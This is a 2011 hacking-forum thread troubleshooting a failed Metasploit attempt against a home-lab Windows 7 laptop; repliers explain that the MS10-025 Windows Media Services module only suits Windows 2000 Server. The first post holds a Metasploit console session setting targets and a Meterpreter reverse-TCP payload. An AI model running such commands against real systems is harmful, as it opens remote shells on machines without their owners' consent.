Metasploit error

What's the best way to setup a home network? Why should I care about BGP?

Metasploit error

Post by centip3de on Sun Apr 10, 2011 11:20 pm
([msg=56234]see Metasploit error[/msg])

So I just started using Metasploit today, and set-up my laptop (Running Win 7) to test some exploits, for learning purposes of course. ;) I went over and disabled all of the firewalls (Including Windows Firewall) and AV's I have on that computer. I then went over to my desktop (also running Win7) and started using Metasploit. But when I tried to run an exploit, it says "Exploit Exception: The connection was refused by the remote host (192.168.33.1:1755)". Thinking I missed an AV or firewall I went over and checked, but it appears that all are disabled... I'm perplexed to say the least. Here's exactly what I did in Metasploit:

Code: Select all
msf > use windows/mmsp/ms10_025_wmss_connect_funnel
msf exploit(ms10_25_wmss_connect_funnel) > set RHOST 192.168.33.115
RHOST => 192.168.33.115
msf exploit(ms10_25_wmss_connect_funnel) > set LHOST 192.168.33.101
LHOST => 192.168.33.101
msf exploit(ms10_25_wmss_connect_funnel) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_25_wmss_connect_funnel) > exploit
[*] Started reverse handler on 192.168.33.101:4444
[-] Exploit exception: The connection was refused by the remote host (192.168.33.115:1755)
[*]Exploit compleated: No session was started


Thanks for any and all help!
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
User avatar
centip3de
Moderator
Moderator
 
Posts: 1449
Joined: Fri Aug 20, 2010 5:46 pm
Blog: View Blog (0)


Re: Metasploit error

Post by Goatboy on Sun Apr 10, 2011 11:27 pm
([msg=56235]see Re: Metasploit error[/msg])

Well I think the most obvious problem is that you're using an exploit on a product that is not vulnerable. "ms10_025_wmss_connect_funnel" is an exploit written in Ruby that takes advantage of a vulnerability in Windows Media Services. This is included in Windows 2000 Server, but is not enabled by default. Windows 7 != Windows 2000 Server.

http://packetstormsecurity.org/files/favorite/88649/
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2823
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: Metasploit error

Post by centip3de on Sun Apr 10, 2011 11:35 pm
([msg=56236]see Re: Metasploit error[/msg])

Goatboy wrote:Well I think the most obvious problem is that you're using an exploit on a product that is not vulnerable. "ms10_025_wmss_connect_funnel" is an exploit written in Ruby that takes advantage of a vulnerability in Windows Media Services. This is included in Windows 2000 Server, but is not enabled by default. Windows 7 != Windows 2000 Server.

http://packetstormsecurity.org/files/favorite/88649/


...../facepalm
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
User avatar
centip3de
Moderator
Moderator
 
Posts: 1449
Joined: Fri Aug 20, 2010 5:46 pm
Blog: View Blog (0)


Re: Metasploit error

Post by jgreen45 on Mon Apr 11, 2011 8:18 am
([msg=56242]see Re: Metasploit error[/msg])

Goatboy wrote:Well I think the most obvious problem is that you're using an exploit on a product that is not vulnerable. "ms10_025_wmss_connect_funnel" is an exploit written in Ruby that takes advantage of a vulnerability in Windows Media Services. This is included in Windows 2000 Server, but is not enabled by default. Windows 7 != Windows 2000 Server.

http://packetstormsecurity.org/files/favorite/88649/


I remember reading a HTS post by someone linking to a black hat live hacking of a windows 7 box, (or what nmap suggested the box was) blackhat2012 used the ms10_025_wmss_connect_funnel exploit to connect and shut-down the victims computer, so I think that might be the place where centip3de may have gotten the idea from. Personally i am perplexed why the youtube video maker decided to used this exploit as it only works on Windows 2000.

The video
I can't come to bed...
Someone is WRONG on the internet


http://xkcd.com/386/
User avatar
jgreen45
Poster
Poster
 
Posts: 106
Joined: Wed Feb 25, 2009 6:18 pm
Blog: View Blog (0)


Re: Metasploit error

Post by Goatboy on Mon Apr 11, 2011 2:51 pm
([msg=56249]see Re: Metasploit error[/msg])

That was a live hack, meaning there was an actual victim on the other computer. This person probably enabled WMS on his machine. I'm guessing centip3de did not.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2823
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: Metasploit error

Post by centip3de on Mon Apr 11, 2011 6:31 pm
([msg=56257]see Re: Metasploit error[/msg])

Goatboy wrote:That was a live hack, meaning there was an actual victim on the other computer. This person probably enabled WMS on his machine. I'm guessing centip3de did not.


Actually, we had the same process running... But I think my Cisco has "port protected up", so I'll have to change that.
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
User avatar
centip3de
Moderator
Moderator
 
Posts: 1449
Joined: Fri Aug 20, 2010 5:46 pm
Blog: View Blog (0)



Return to Networking

Who is online

Users browsing this forum: No registered users and 0 guests